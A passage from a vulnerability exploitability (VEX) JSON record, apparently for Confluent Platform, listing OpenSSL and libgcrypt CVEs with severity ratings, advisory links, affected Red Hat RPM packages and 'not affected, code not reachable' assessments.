          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2025-15699.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:15699"
        },
        {
          "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-13176.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250120.txt"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0005/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250418-0010/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250502-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7264-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7278-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL"
        }
      ],
      "published": "2025-01-20T14:15:26+00:00",
      "updated": "2026-06-17T07:01:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-2236",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-2236"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9404"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3530"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:3534"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-2236"
        },
        {
          "url": "https://bugzilla.redhat.com/2245218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268268"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2236"
        },
        {
          "url": "https://dev.gnupg.org/T7136"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9404.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9404"
        },
        {
          "url": "https://github.com/tomato42/marvin-toolkit/tree/master/example/libgcrypt"
        },
        {
          "url": "https://gitlab.com/redhat-crypto/libgcrypt/libgcrypt-mirror/-/merge_requests/17"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-2236.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9404.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gcrypt-devel/2024-March/005607.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2236"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-2236"
        }
      ],
      "published": "2024-03-06T22:15:57+00:00",
      "updated": "2026-06-17T07:24:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-2511",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1325
      ],
      "description": "Issue summary: Some non-default TLS server configurations can cause unbounded\nmemory growth when processing TLSv1.3 sessions\n\nImpact summary: An attacker may exploit certain server configurations to trigger\nunbounded memory growth that would lead to a Denial of Service\n\nThis problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is\nbeing used (but not if early_data support is also configured and the default\nanti-replay protection is in use). In this case, under certain conditions, the\nsession cache can get into an incorrect state and it will fail to flush properly\nas it fills. The session cache will continue to grow in an unbounded manner. A\nmalicious client could deliberately create the scenario for this failure to\nforce a Denial of Service. It may also happen by accident in normal operation.\n\nThis issue only affects TLS servers supporting TLSv1.3. It does not affect TLS\nclients.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. OpenSSL\n1.0.2 is also not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-2511"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/08/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9333"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-2511"
        },
        {
          "url": "https://bugzilla.redhat.com/2274020"
        },
        {
          "url": "https://bugzilla.redhat.com/2281029"
        },
        {
          "url": "https://bugzilla.redhat.com/2283757"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2281029"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-354112.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-398330.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-613116.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-769027.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2511"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4603"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4741"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9333.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9333"
        },
        {
          "url": "https://github.com/advisories/GHSA-299c-jvhc-gxj8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7e4d731b1c07201ad9374c1cd9ac5263bdf35bce"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/b52867a9f618bb955bed2a3ce3db4d4f97ed8e5d"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/e9d7083e241670332e0443da0f0d4ffb52829f08"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/5f8d25770ae6437db119dfc951e207271a326640"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-2511.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9333.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00033.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00000.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2511"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240503-0013"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240503-0013/"
        },
        {
